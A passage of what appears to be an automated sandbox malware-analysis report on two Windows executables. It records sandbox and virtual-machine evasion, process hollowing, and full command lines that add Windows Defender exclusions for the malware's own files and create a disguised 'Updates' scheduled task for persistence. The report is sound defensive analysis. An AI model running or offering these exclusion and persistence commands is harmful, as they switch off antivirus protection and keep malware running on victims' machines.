              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: 4F30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: 7FD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: 8FD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: 9190000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory allocated: 72B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory allocated: 82B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory allocated: 8450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory allocated: 9450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7560Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 545Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8097Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 403Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exe TID: 3936Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4288Thread sleep count: 8097 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948Thread sleep count: 403 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exe TID: 1076Thread sleep count: 81 > 30Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exe TID: 1076Thread sleep time: -4860000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe TID: 3032Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: HxQXdrrQ.exe, 0000000A.00000002.2115861588.000000000597F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: HxQXdrrQ.exe, 0000000F.00000002.2088749418.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
              Source: YvVDV4cbjy.exe, 00000000.00000002.2063301617.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\X F
              Source: YvVDV4cbjy.exe, 00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_0040317B mov eax, dword ptr fs:[00000030h]15_2_0040317B
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_00402B7C GetProcessHeap,HeapAlloc,15_2_00402B7C
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMemory written: C:\Users\user\Desktop\YvVDV4cbjy.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMemory written: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeQueries volume information: C:\Users\user\Desktop\YvVDV4cbjy.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
